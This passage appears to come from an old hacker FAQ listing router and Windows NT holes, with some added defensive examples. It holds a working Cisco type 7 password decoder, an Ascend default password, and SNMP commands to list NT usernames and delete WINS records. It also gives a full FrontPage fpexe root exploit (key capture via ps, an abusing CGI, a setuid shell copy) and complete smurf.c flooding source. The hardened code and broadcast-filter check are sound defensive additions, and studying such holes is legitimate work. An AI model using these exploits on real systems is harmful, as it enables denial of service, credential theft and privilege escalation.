      When you look at your configuration file, the passwords are displayed in type 7 form. Note that type 7 is a reversible obfuscation rather than a one-way hash, so anyone who can read the configuration (including backups, TFTP copies and show running-config output) can recover the plaintext. The display will look similar to the following:
      hostname Adam
      interface serial 0
      encapsulation ppp
      ppp authentication chap
      username Adam password 7 1514040356
      username Eve password 7 121F0A18
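The two "password 7" strings above are reversible, which the following decoder demonstrates. It is an added example, not part of the Cisco documentation; the constant key string it uses is the widely published IOS type 7 key (an assumption about IOS internals, not something the documentation states). Run against the sample configuration, the Adam and Eve entries decode to "foo2" and "foo" respectively, which also shows that the sample strings in the documentation were not produced from the plaintexts "oursystem" and "theirsystem" given above.

```c
/* Decoder for Cisco IOS "type 7" passwords, the "password 7 ..." form
 * shown in the configuration above. Added example, not part of the
 * Cisco documentation. Type 7 is a fixed-key XOR, not a hash: the first
 * two decimal digits select a start offset into a constant key string,
 * and each following hex byte is XORed with the next key byte. Anyone
 * who can read the configuration can reverse it. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* The constant key used by IOS for type 7 (widely published; assumed). */
static const char XLAT[] =
    "dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87";

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode enc (e.g. "1514040356") into out as a NUL-terminated string.
 * Returns the number of plaintext bytes, or -1 if enc is malformed
 * (odd length, bad seed, non-hex digit) or out is too small. */
int type7_decode(const char *enc, char *out, size_t outlen)
{
    size_t n = strlen(enc), i, j = 0, klen = sizeof XLAT - 1;
    int seed, hi, lo;

    if (n < 2 || n % 2 != 0 || !isdigit((unsigned char)enc[0]) ||
        !isdigit((unsigned char)enc[1]))
        return -1;
    seed = (enc[0] - '0') * 10 + (enc[1] - '0');
    if ((size_t)seed >= klen) return -1;

    for (i = 2; i < n; i += 2) {
        hi = hexval((unsigned char)enc[i]);
        lo = hexval((unsigned char)enc[i + 1]);
        if (hi < 0 || lo < 0 || j + 1 >= outlen) return -1;
        out[j] = (char)(((hi << 4) | lo) ^ XLAT[(seed + j) % klen]);
        j++;
    }
    out[j] = '\0';
    return (int)j;
}

int main(void)
{
    /* The two type 7 strings from the Adam/Eve configuration above. */
    const char *samples[] = { "1514040356", "121F0A18" };
    char plain[64];
    size_t k;

    for (k = 0; k < 2; k++) {
        if (type7_decode(samples[k], plain, sizeof plain) < 0)
            printf("%s: malformed\n", samples[k]);
        else
            printf("%s -> %s\n", samples[k], plain);
    }
    return 0;
}
```

For threat-modelling purposes treat anything stored as type 7 as plaintext: service password-encryption only hides a value from someone glancing at the screen, so the configuration file itself has to be protected as a secret.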
      Related Commands
      A dagger (†) indicates that the command is documented outside this chapter. Two daggers (††) indicate that the command is documented in the Debug Command Reference.
      arap callback †
      callback-forced-wait †
      debug callback ††
      ppp callback †
      [12.8.8] A Word on Ascend Routers
      Ascend routers are fine, but they are not as powerful or as configurable as Cisco routers, so we will not spend as much time on them. Actually, we will not spend any time on them. The only thing we will say is that unless an administrator has changed it, the default password on an Ascend is either blank or "ascend".
      [13.0.0] Known NT/95/IE Holes
      [13.0.1] WINS port 84
      Found by NeonSurge (rhino9 team)
      This is not a critical bug; it is more of a nuisance than anything else. If you telnet to, or stream data at, port 84 of an NT server, it causes an error to be recorded in the event log. On some systems this can fill the hard drive completely with error messages, causing other applications to fail for lack of drive space. The flaw also makes the server respond extremely slowly.
      For the telnet attack, simply telnet to the WINS port on an NT server, type some garbage characters and hit enter; this causes the event log entry.
      The same effect was achieved by using an application called pepsi to stream UDP data to the same port.
      [13.0.2] WindowsNT and SNMP

      Found by Christopher Rouland (from ntsecurity.net)

      Christopher writes:

      I have found two significant "features" in the SNMP agent implementations under NT 4.0 Server, and I am sure there are more if I feel like really digging. The first issue I sent in earlier this year to Microsoft and received no response other than "expected behavior" and the second I just found and puts any large NT shop at a serious denial of service (DOS) risk.

      1. This first exploit demonstrates the ability via SNMP to dump a list of all usernames in an NT domain (assuming the target box is a DC) or on an NT Server.
      Here is the simplest NT example I could find to use this:
      C:\NTRESKIT>snmputil walk <host> public .1.3.6.1.4.1.77.1.2.25
      <host> should be a domain controller or server
      2. The second exploit demonstrates the ability via SNMP to delete all of the records in a WINS database remotely, bypassing all NT security. If you understand large scale WINS architecture, you can understand the implications of this. Knowledge of SNMP community strings would allow an attacker to effectively shut down any large NT infrastructure with "N" commands (N=number of WINS servers). This is permitted due to the extensive "cmd" set implemented in the WINS extension agent, specifically:

      2. cmdDeleteWins OBJECT-TYPE
      SYNTAX IpAddress
      ACCESS read-write
      STATUS mandatory

      [13.0.3] FrontPage 98 Server Extensions (fpexe)

      (from ntsecurity.net)

      The attack was described most adequately by the discoverer:
      Change History
      Sat Oct 11 1997: Initial posting of web page
      Wed Oct 15 1997: Microsoft posted a note responding to the issues raised. I am glad to see that they have plans to release the source of the revised version for review when it is complete. I will update this page with further comments when the fixed version is released.
      Wed Oct 22 1997: Microsoft has released a new version of the extensions that claim to fix the security issues. I will comment further on the security of their proposed fix after I have time to review the changes. Check back here in a few days for my comments.
      Introduction
      The information below talks about using Microsoft's FrontPage 98 extensions with Apache on Unix with Microsoft's mod_frontpage changes. This does not apply to running it on any other server, to running it on Unix without the Microsoft mod_frontpage changes, or to running it on Windows NT. There are, however, other security issues on such servers, some of which are similar to those in the FrontPage 97 extensions. I should also note that the Unix server extensions seem to be written in part or completely by Ready-to-Run Software Inc. (RTR) for Microsoft. I will refer to it as Microsoft's product because it is, no matter who wrote it. This discussion is specific to the FrontPage 98 extensions. For more general information on some security problems in earlier versions, some of which are resolved and some of which aren't, see Scott Fritchie's Why I Don't Like Microsoft's FrontPage Web Authoring Tool web page. Parts of it are no longer entirely relevant, but it provides a good background.
      It is no secret that the security of the FrontPage 97 and earlier Unix server extensions is quite poor, if Microsoft's instructions are followed. Some of their instructions were quite hilarious when first released, like the suggestion of running your web server as root. It is possible to make them more acceptable--acceptable enough for some sites--but it requires careful work by the administrator.
      It had appeared like Microsoft had increased the security of the extensions in the FP98 version available from Microsoft's Web Site. However, a closer examination reveals startling flaws. What they have done is make a small setuid root wrapper that the web server calls. This wrapper then setuid()s to the appropriate user and runs the requested FP CGI as that user. The problem lies in the fact that the wrapper ("fpexe") is written very poorly. While making such a wrapper secure can be difficult, the gaping holes in this program show a complete lack of understanding of security in the Unix environment.
      The fpexe program is available for you to inspect yourself. It was originally posted in RTR's FrontPage FAQ. This version is not exactly the same as the one currently distributed (at least it is not the same as the one in the BSD/OS 2.1 kit), but it is close. Both appear to exhibit the same failings.
      When I refer to the FP CGI programs, I am referring to the three files normally referenced under the _vti_bin directory: shtml.exe, admin.exe and author.exe.
      The key in this discussion is the fact that nothing is stopping anyone from trying to run this fpexe wrapper. If they can trick it into running, they can possibly gain privileges they shouldn't.
      How It Works
      Before you can understand the holes in the FP server extensions, you need to understand what I mean when I talk about the "key". When the Frontpage-modified Apache server starts up, it generates a pseudo-random string of 128 ASCII characters as a key. This key is written to a file that is only readable by the user that starts Apache; normally root. The server then passes the key to fpexe. Since fpexe is setuid root, it can compare the key stored on disk with the one it was passed to be sure they match; if not, it refuses to run. This is used in an attempt to guarantee that the only thing calling fpexe is the web server. Used properly this is a powerful part of possible security precautions. I am not convinced that the generation of the key is cryptographically adequate and it may be subject to intelligent guessing attacks, however I have not looked at it to see. As discussed later, the cryptographic robustness of the key doesn't really matter.
      There are a number of problems with the setuid root fpexe program. I am not attempting a complete description of all the problems and their possible consequences and fixes, just making a light sweep over the top. The more obvious problems include:
      Return codes from library calls are not properly checked. An example:
      f = fopen( buf, "r");
      fgets( key, 129, f );
      fclose(f);
      If fopen() failed (easy to make it do so with ulimit -n), then if your system did not core dump on a fgets() on a closed descriptor you would end up with an empty key. It is obviously easy to guess an empty key. I am not aware of any systems that exhibit this exact problem, but it is possible. Return codes need to be checked, especially in setuid programs.
      Proper bounds checking is not done. This leads to obvious buffer overflows. An example:
      strcpy( work, FPDIR );
      strcat( work, getenv("FPEXE") );
      I won't go into the details of what this does, but if you could cause this code to be executed, you could insert your own code on most systems and likely gain access to the UID the program is running as (root). This proves to be an unnecessary effort to go to, because this code is only executed if you have the correct key; if you have the correct key, there are far easier ways to gain access. Buffer overflows are one of the most popular (albeit normally boring) types of new holes in programs being publicized.
      It does not clean the environment variables before starting the CGI. Again, this means you can gain access to the UID that the program runs as (not root). If the rest of the program was securely written, this could possibly be an issue however it is of little consequence currently due to the gaping holes in other areas.
      It assumes that if you have the key, then you are authorized to have it run any program as nearly any user you tell it to. The process you are running also needs to be in the same process group as the web server; all CGIs run by the server, however, are in the same process group so if you can run a CGI script you can work around the second check. It does no further checks to be sure you are running as a user that should be allowed to run FrontPage CGIs (other than disallowing UID 0; the compiled version also disallows gid 0, however the source version doesn't) or that you are running a Frontpage related program. This means that if you get the key file, you can gain access to any non-root UID on the server. On 99% of boxes, that will give you root. For example, if binaries are owned by bin then become bin and replace one that is run by root from cron. The possibilities are endless once you obtain this level of access.
      And, finally, the worst: it passes the key to fpexe via an environment variable! On most systems, environment variables are available via "ps -e". This means that anyone with access to run programs on the system (and there are often more people than you think that are able to do this, due to things such as CGIs) can see it as it is being passed from the web server to fpexe. Recall that once you have the key, there is little remaining before you can get full access to the system.
      Demonstration
      By now, it should be obvious that there is a serious security problem in the FrontPage 98 server extensions. Here is one demonstration; do not think that this is the only way or that just because you prevent one step of this process from working it is any more difficult to exploit the security holes.
      First I have to find the key. This can be done by using ps to get the environment from fpexe. To do this, I first setup a loop running (this assumes a real aka. Bourne shell; if you use the bastard C-shell it obviously won't work as written):
      while true; do ps axuwwe -U nobody | grep FPKEY; done
      Then I used ZeusBench, a very simple HTTP benchmark program, to generate load on the server:
      zb localhost /fp/_vti_bin/shtml.exe -c 50 -t 30
      Any method of generating traffic could be used, including a web browser. Since I am using a very inefficient method of looking for a process, I need to generate lots of traffic to increase my chance of finding one. It certainly isn't likely to happen on the first request. The requests do have to be made to a FP CGI script so it will call fpexe.
      Before long, I had what I wanted from ps (manually wrapped):
      nobody 28008 0.0 0.2 180 76 ?? DN 6:51PM 0:00.01
      SCRIPT_URL=/fp/ SCRIPT_URI=http://localhost/fp/ FPUID=1000 FPGID=1000
      FPEXE=/_vti_bin/shtml.exe FPKEY=9AF675E332F7583776C241A4795FE387D8E5DC80E77
      3FAB70794848FDEFB173FF14CDCDC44F3FAAF144A8C95A81C04BF5FC2B9EFDE3C8DCA1049CD
      F760364E59 HTTP_USER_AGENT=ZeusBench/1.0 HTTP_ACCEPT=*/*
      PATH=/sbin:/usr/sbin:/bin:/usr/local/bin:/usr/bin:/usr/local/sbin/
      SERVER_SOFTWARE=Apache/1.2.5-dev SERVER_NAME=localhost SERVER_PORT=80
      REMOTE_HOST=localhost REMOTE_ADDR=127.0.0.1
      DOCUMENT_ROOT=/usr/local/etc/httpd/htdocs SERVER_ADMIN=marcs@znep.com
      SCRIPT_FILENAME=/usr/local/frontpage/currentversion/apache-fp/_vti_bin/fpexe
      REMOTE_PORT=2849 GATEWAY_INTERFACE=CGI/1.1 SERVER_PROTOCOL=HTTP/1.0
      REQUEST_METHOD=GET QUERY_STRING= REQUEST_URI=/fp/_vti_bin/shtml.exe
      SCRIPT_NAME=/fp/_vti_bin/shtml.exe fpexe
      Then I need to use the key to make fpexe think I am the web server. I can't just run this from a normal shell, since I need to be in the same process group as the web server. A simple CGI suffices:
      #!/bin/sh
      echo Content-type: text/plain
      echo
      export FPUID=3;
      export FPGID=3;
      export FPEXE=../../../../../../../../tmp/gotcha;
      export FPKEY=9AF675E332F7583776C241A4795FE387D8E5DC80E773FAB70794848FDEFB173FF14CDCDC44F3FAAF144A8C95A81C04BF5FC2B9EFDE3C8DCA1049CDF760364E59
      /usr/local/frontpage/currentversion/apache-fp/_vti_bin/fpexe 2>&1

      I need a program for it to run (/tmp/gotcha in this example):
      #!/bin/sh
      /usr/bin/id
      cp /bin/sh /tmp/.mysh
      chmod u+s /tmp/.mysh
      Then I simply make a HTTP request for the CGI script. I can then run /tmp/.mysh at my leisure to gain access to UID 3 (bin on my system) and do what I want from there.
      Stopping the Problem:
      Load the new extensions from here. So now you want to fix it. Well. That's the hard part. The only real solution is for someone (either Microsoft or a third party) to do some work to improve the security. It is possible to do this securely. Microsoft hasn't. They have no excuse. This page will be updated when (if?) better fixes become available.
      The Apache web server has a suEXEC wrapper designed to allow for a similar thing; that is, execution of CGI scripts under a user's own UID. It is very restrictive (some would say anal) about what it allows: there is a reason for that, as Microsoft's obviously failed attempt at security shows. It is possible that suEXEC could be adapted to function in conjunction with FrontPage, however it will not work without source modifications.
      One short term workaround until Microsoft addresses the issue is to simply remove the FrontPage setup from your system. This can be done temporarily by removing the setuid bit from fpexe (ie. chmod u-s fpexe). This will prevent all the pretty FrontPage CGIs from working. It will prevent people from uploading new pages using FrontPage's own methods (ie. they can tell FrontPage to use FTP and they will still be uploaded), but generic content that doesn't rely on FrontPage's server side CGI scripts should work fine.
      Another possible workaround is to prevent users from running the ps command. This could have a very negative impact on your system if things depend on it, and is a poor solution however it may be the best one for you. On systems that don't use a procfs (/proc) based ps, you can normally simply remove world execute permissions from it to disable it. If you are on a system like Linux that normally uses a procfs for ps to get information, this doesn't solve the problem because someone can read from the procfs directly.
      Last of all, since this problem only occurs when using FrontPage with the mod_frontpage extensions, it is possible to use the FrontPage extensions on Apache without using mod_frontpage or fpexe. Unfortunately, this conversion is not easy. It means that, after recompiling Apache without any of the Microsoft modifications (just commenting out mod_frontpage from the Configuration file may be enough; haven't checked) you have to either manually copy the FrontPage CGIs to the appropriate subdirectory under each user's web directory and make them setuid to that user or copy them (or make links) and don't make them setuid to that user. The former preserves the current ownership. With the latter all the user's web files will need to be changed back to being owned by the user the web server runs as or else they will be unable to manipulate them and some of the FP CGIs won't run correctly. This is a pain and brings you back to the horrible security practice of letting anyone who can run CGIs modify any FrontPage user's files. Although this may be the best temporary workaround (although quite annoying if you have a large number of users), I can not go into step by step details of how to accomplish this change because I am not fully familiar with various ways of using the FrontPage extensions. The Microsoft FP security considerations document (part of the FP98 Server Extensions Resource Kit) provides some more details of the method in which the CGIs are run without fpexe.

      Comments:
      This sort of continued disregard for security is unacceptable and inexcusable. It does not take significant knowledge to know that some of the things being done are flawed. If internal expertise is not available, an external consultant should be hired for a security review of any critical code such as fpexe. This is not rocket science nor is it particularly advanced programming. Nothing that I have described above is complicated or new. Code reviews are common practice in many companies and serve good purpose.
      Once Microsoft fixes their glaring holes, assuming they do, I would suggest you should consider if you want to run their FrontPage extensions at all. Even though, once fpexe is properly fixed, you only risk the accounts of users using FrontPage (since that is who the FrontPage CGI scripts run as), that can be a significant risk. It is very possible that when someone gets bored they will find a hole in the FrontPage CGI scripts that gives them user level access to your system. And Microsoft doesn't (and isn't likely to in the future, if their past is any indication) give the source to those. Microsoft's own source speaks better for itself than anyone else ever could.
      I have this nagging feeling that this will result in Microsoft coming out with a "fixed" version and not releasing the source to it at all. After all, it was only after the source came out that these flaws became a problem. Right? Wrong. This was a gaping hole waiting to be discovered. It would have almost certainly been discovered sooner or later regardless of source availability; better sooner than later. I certainly hope that Microsoft doesn't think the lesson in this is that source should not be released. It is insecure with or without the source. The FrontPage server extensions aren't going to find their way anywhere near any machines I control any time soon because I have no trust in the company behind them.
      On a side note, Microsoft actually modifies the server name returned to clients when the FrontPage patches are installed in Apache to include "FrontPage/x.x.x". That is fine, however it gives anyone connecting to your server the ability to determine the chances of them being able to break into your system using holes in the FP server extensions.
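Added example, written for this page and not part of fpexe, Microsoft's or RTR's code: hardened counterparts of the two snippets the advisory quotes, the unchecked fopen()/fgets() key read and the unbounded strcpy()/strcat() path build. The key file layout (one 128-character line), the FPDIR value and the three CGI names are taken from the advisory text; everything else, including the function names, is an assumption made for the example.

```c
/* Hardened counterparts of the two fpexe snippets quoted in the advisory
 * above: reading the 128-character key, and building the path of the CGI
 * to exec. Added example, not Microsoft's or RTR's code. The key file
 * format, KEY_LEN, FPDIR and the CGI names are assumptions taken from the
 * advisory text. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define KEY_LEN 128
#define FPDIR   "/usr/local/frontpage/currentversion/apache-fp/_vti_bin/"

/* Read exactly KEY_LEN key characters from f. Returns 0 on success, -1 if
 * the stream is unusable or the key is short: an unchecked fopen()/fgets()
 * failure must never leave an empty, trivially guessable key behind. */
int read_key_stream(FILE *f, char *key, size_t keylen)
{
    char line[KEY_LEN + 2];            /* key + '\n' + NUL */
    size_t n;

    if (f == NULL || keylen < KEY_LEN + 1) return -1;
    if (fgets(line, sizeof line, f) == NULL) return -1;
    n = strcspn(line, "\r\n");
    if (n != KEY_LEN) return -1;       /* truncated or malformed key file */
    memcpy(key, line, KEY_LEN);
    key[KEY_LEN] = '\0';
    return 0;
}

int read_key_file(const char *path, char *key, size_t keylen)
{
    FILE *f = fopen(path, "r");
    int rc;

    if (f == NULL) return -1;          /* the original ignored this case */
    rc = read_key_stream(f, key, keylen);
    fclose(f);
    return rc;
}

/* Constant-time comparison of two KEY_LEN keys so a wrong key does not
 * leak how many leading characters matched. Returns 1 if equal. */
int key_equal(const char *a, const char *b)
{
    unsigned char diff = 0;
    size_t i;

    for (i = 0; i < KEY_LEN; i++) diff |= (unsigned char)(a[i] ^ b[i]);
    return diff == 0;
}

/* Build FPDIR + name with bounds checking, accepting only one of the three
 * FrontPage CGI names and nothing containing a '/' or "..". The original
 * strcpy()/strcat() accepted FPEXE=../../../../tmp/gotcha. Returns 0 on
 * success, -1 if the name is rejected or out is too small. */
int build_fp_path(const char *name, char *out, size_t outlen)
{
    int n;

    if (name == NULL || name[0] == '\0') return -1;
    if (strchr(name, '/') != NULL || strstr(name, "..") != NULL) return -1;
    if (strcmp(name, "shtml.exe") != 0 && strcmp(name, "admin.exe") != 0 &&
        strcmp(name, "author.exe") != 0)
        return -1;                     /* allow-list, not a deny-list */
    n = snprintf(out, outlen, "%s%s", FPDIR, name);
    if (n < 0 || (size_t)n >= outlen) return -1;
    return 0;
}

/* Self-check: write a 128-character key to a temporary file, read it back
 * through read_key_stream() and compare. Returns 1 on success. */
int key_roundtrip_demo(void)
{
    char key[KEY_LEN + 1], got[KEY_LEN + 1];
    FILE *f = tmpfile();
    int i;

    if (f == NULL) return 0;
    for (i = 0; i < KEY_LEN; i++) key[i] = "0123456789ABCDEF"[i % 16];
    key[KEY_LEN] = '\0';
    fprintf(f, "%s\n", key);
    rewind(f);
    if (read_key_stream(f, got, sizeof got) != 0) { fclose(f); return 0; }
    fclose(f);
    return key_equal(key, got);
}

int main(void)
{
    char path[256];

    printf("key roundtrip: %s\n", key_roundtrip_demo() ? "ok" : "FAILED");
    printf("shtml.exe -> %d\n", build_fp_path("shtml.exe", path, sizeof path));
    printf("traversal -> %d\n",
           build_fp_path("../../../../tmp/gotcha", path, sizeof path));
    return 0;
}
```

Note what this does not fix: the key still reaches the wrapper through the environment, where ps can read it. Closing that requires changing how the server hands over the key (an inherited pipe or file descriptor that other users cannot read) and authorising the caller by something stronger than process-group membership; a bounds-checked wrapper that still trusts a leaked key remains exploitable exactly as demonstrated.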

      [13.0.4] TCP/IP Flooding with Smurf

      Found by TFreak (from ntsecurity.net)

      The Problem
      The smurf attack is simple. The program reads a list of broadcast addresses into an array and sends a spoofed ICMP echo request to each of them in turn, cycling through the list, with the victim's address as the source. Every host on each broadcast network that answers pings replies to the victim, so one packet sent becomes many packets received; depending on the number of broadcast addresses used, the result is a devastating flood of replies at the spoofed IP.
      This attack can EASILY saturate a T1 circuit, rendering it completely useless. The networks serving as amplifiers are those whose routers forward IP directed broadcasts; on Cisco IOS, no ip directed-broadcast on each interface stops a router from forwarding them, and ingress filtering of source addresses keeps spoofed packets from leaving the attacker's network in the first place.
      HERE IS THE SMURF SOURCE CODE:
      /*
       * $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $
       *
       * spoofs icmp packets from a host to various broadcast addresses resulting
       * in multiple replies to that host from a single packet.
       *
       * disclaimer:
       * I cannot and will not be held responsible nor legally bound for the
       * malicious activities of individuals who come into possession of this
       * program and I refuse to provide help or support of any kind and do NOT
       * condone use of this program to deny service to anyone or any machine.
       * This is for educational use only. Please Don't abuse this.
       *
       * TFreak
       */
      /* Needs a raw socket (root) and the Linux struct iphdr/icmphdr layouts. */
      #include <signal.h>
      #include <stdio.h>
      #include <stdlib.h>
      #include <sys/socket.h>
      #include <sys/types.h>
      #include <netinet/in.h>
      #include <netinet/ip.h>
      #include <netinet/ip_icmp.h>
      #include <netdb.h>
      #include <ctype.h>
      #include <arpa/inet.h>
      #include <unistd.h>
      #include <string.h>

      void banner(void);
      void usage(char *);
      void smurf(int, struct sockaddr_in, u_long, int);
      void ctrlc(int);
      unsigned short in_chksum(u_short *, int);

      /* stamp */
      char id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $";

      int main (int argc, char *argv[])
      {
          struct sockaddr_in sin;
          struct hostent *he;
          FILE *bcastfile;
          int i, sock, bcast = 1, delay, num, pktsize, cycle = 0, x;
          char buf[32], **bcastaddr = malloc(8192);

          banner();
          signal(SIGINT, ctrlc);

          if (argc < 6) usage(argv[0]);

          /* argv[1] is the victim: its address becomes the spoofed source */
          if ((he = gethostbyname(argv[1])) == NULL) {
              perror("resolving source host");
              exit(-1);
          }
          memcpy((caddr_t)&sin.sin_addr, he->h_addr, he->h_length);
          sin.sin_family = AF_INET;
          sin.sin_port = htons(0);

          num = atoi(argv[3]);
          delay = atoi(argv[4]);
          pktsize = atoi(argv[5]);

          /* read the amplifier (broadcast) addresses, one per line */
          if ((bcastfile = fopen(argv[2], "r")) == NULL) {
              perror("opening bcast file");
              exit(-1);
          }
          x = 0;
          while (!feof(bcastfile)) {
              fgets(buf, 32, bcastfile);
              if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) continue;
              for (i = 0; i < strlen(buf); i++)
                  if (buf[i] == '\n') buf[i] = '\0';
              bcastaddr[x] = malloc(32);
              strcpy(bcastaddr[x], buf);
              x++;
          }
          bcastaddr[x] = 0x0;
          fclose(bcastfile);

          if (x == 0) {
              fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]);
              exit(-1);
          }
          if (pktsize > 1024) {
              fprintf(stderr, "ERROR: packet size must be < 1024\n\n");
              exit(-1);
          }

          /* raw socket: we supply the IP header (and the forged source) ourselves */
          if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
              perror("getting socket");
              exit(-1);
          }
          setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *)&bcast, sizeof(bcast));

          printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);

          /* num == 0 means flood forever; cycle through the broadcast list */
          for (i = 0; i < num || !num; i++) {
              if (!(i % 25)) { printf("."); fflush(stdout); }
              smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize);
              cycle++;
              if (bcastaddr[cycle] == 0x0) cycle = 0;
              usleep(delay);
          }
          puts("\n\n");
          return 0;
      }

      void banner (void)
      {
          puts("\nsmurf.c v4.0 by TFreak\n");
      }

      void usage (char *prog)
      {
          fprintf(stderr, "usage: %s <target> <bcast file> <num packets> "
                          "<packet delay> <packet size>\n\n"
                          "target = address to hit\n"
                          "bcast file = file to read broadcast addresses from\n"
                          "num packets = number of packets to send (0 = flood)\n"
                          "packet delay = wait between each packet (in ms)\n"
                          "packet size = size of packet (< 1024)\n\n", prog);
          exit(-1);
      }

      /* build one IP/ICMP echo request from the victim (sin) to dest and send it */
      void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize)
      {
          struct iphdr *ip;
          struct icmphdr *icmp;
          char *packet;

          packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
          ip = (struct iphdr *)packet;
          icmp = (struct icmphdr *) (packet + sizeof(struct iphdr));

          memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);

          ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
          ip->ihl = 5;
          ip->version = 4;
          ip->ttl = 255;
          ip->tos = 0;
          ip->frag_off = 0;
          ip->protocol = IPPROTO_ICMP;
          ip->saddr = sin.sin_addr.s_addr;      /* the spoofed source */
          ip->daddr = dest;                     /* the broadcast address */
          ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr));
          icmp->type = 8;                       /* ICMP echo request */
          icmp->code = 0;
          icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize);

          sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize,
                 0, (struct sockaddr *)&sin, sizeof(struct sockaddr));

          free(packet); /* free willy! */
      }

      void ctrlc (int ignored)
      {
          puts("\nDone!\n");
          exit(1);
      }

      /* standard ones'-complement Internet checksum (RFC 1071) */
      unsigned short in_chksum (u_short *addr, int len)
      {
          register int nleft = len;
          register int sum = 0;
          u_short answer = 0;

          while (nleft > 1) {
              sum += *addr++;
              nleft -= 2;
          }

          if (nleft == 1) {
              *(u_char *)(&answer) = *(u_char *)addr;
              sum += answer;
          }

          sum = (sum >> 16) + (sum & 0xffff);   /* fold the carry into the low 16 bits */
          sum += (sum >> 16);
          answer = ~sum;
          return(answer);
      }
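The check that stops a network from being used as an amplifier is whether a router forwards ICMP echo requests addressed to a subnet's directed-broadcast address. The following is an added example, not part of smurf.c or TFreak's code, showing that per-packet check in C alongside verification of the IP header checksum (the same ones'-complement sum in_chksum computes), using a constructed 192.168.1.0/24 interface and constructed packets of the kind smurf sends. The function names and addresses are chosen for the example.

```c
/* Directed-broadcast filter check for the attack described above: the
 * per-packet test a border router applies when IP directed broadcasts
 * are disabled, plus verification of the IP header checksum that smurf.c
 * computes. Added example, not part of smurf.c; the interface address,
 * mask and packets below are constructed test input. Headers are parsed
 * by byte offset rather than through struct iphdr so it is portable. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IP_HLEN 20            /* IPv4 header length without options */
#define ICMP_ECHO_REQUEST 8

/* RFC 1071 ones'-complement sum over big-endian 16-bit words. Over a
 * header that already contains its checksum the result is 0 when valid. */
uint16_t ip_checksum(const uint8_t *p, size_t len)
{
    uint32_t sum = 0;
    while (len > 1) { sum += (uint32_t)((p[0] << 8) | p[1]); p += 2; len -= 2; }
    if (len == 1) sum += (uint32_t)(p[0] << 8);
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);   /* fold carries */
    return (uint16_t)~sum;
}

static uint32_t get32(const uint8_t *p)
{
    return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | p[3];
}
static void put32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);  p[3] = (uint8_t)v;
}
static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }

/* Dotted-quad helper for the constructed addresses (host byte order). */
uint32_t ip4(int a, int b, int c, int d)
{
    return (uint32_t)a << 24 | (uint32_t)b << 16 | (uint32_t)c << 8 | (uint32_t)d;
}

/* Build the packet smurf sends: IPv4 + ICMP echo request, src spoofed to
 * the victim, dst a broadcast address. Returns the total length. */
size_t build_echo_request(uint32_t src, uint32_t dst, size_t payload, uint8_t *buf)
{
    size_t len = IP_HLEN + 8 + payload;
    memset(buf, 0, len);
    buf[0] = 0x45;                       /* version 4, IHL 5 */
    put16(buf + 2, (uint16_t)len);
    buf[8] = 255;                        /* TTL */
    buf[9] = 1;                          /* IPPROTO_ICMP */
    put32(buf + 12, src);
    put32(buf + 16, dst);
    put16(buf + 10, ip_checksum(buf, IP_HLEN));
    buf[IP_HLEN] = ICMP_ECHO_REQUEST;    /* type 8, code 0 */
    put16(buf + IP_HLEN + 2, ip_checksum(buf + IP_HLEN, 8 + payload));
    return len;
}

/* Returns 1 if pkt is an ICMP echo request to the directed-broadcast
 * address of the network if_addr/if_mask (the packet an amplifier would
 * forward), 0 for any other packet, -1 if the IPv4 header is truncated
 * or its checksum does not verify. */
int is_directed_broadcast_echo(const uint8_t *pkt, size_t len,
                               uint32_t if_addr, uint32_t if_mask)
{
    size_t hlen;
    uint32_t bcast;

    if (len < IP_HLEN || (pkt[0] >> 4) != 4) return -1;
    hlen = (size_t)(pkt[0] & 0x0f) * 4;
    if (hlen < IP_HLEN || len < hlen + 8) return -1;
    if (ip_checksum(pkt, hlen) != 0) return -1;
    if (pkt[9] != 1 || pkt[hlen] != ICMP_ECHO_REQUEST) return 0;
    bcast = (if_addr & if_mask) | ~if_mask;
    return get32(pkt + 16) == bcast ? 1 : 0;
}

int main(void)
{
    uint8_t pkt[128];
    uint32_t iface = ip4(192, 168, 1, 1), mask = 0xffffff00u;   /* 192.168.1.0/24 */
    size_t n;

    n = build_echo_request(ip4(10, 1, 1, 1), ip4(192, 168, 1, 255), 32, pkt);
    printf("echo to 192.168.1.255: %d\n", is_directed_broadcast_echo(pkt, n, iface, mask));
    n = build_echo_request(ip4(10, 1, 1, 1), ip4(192, 168, 1, 10), 32, pkt);
    printf("echo to 192.168.1.10:  %d\n", is_directed_broadcast_echo(pkt, n, iface, mask));
    return 0;
}
```

A router that drops every packet for which this returns 1 on the inbound interface cannot be used as a smurf amplifier; on Cisco IOS that is what no ip directed-broadcast does per interface.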

      [13.0.5] SLMail Security Problem

      Found by David LeBlanc (from ntsecurity.net)

      David LeBlanc writes:
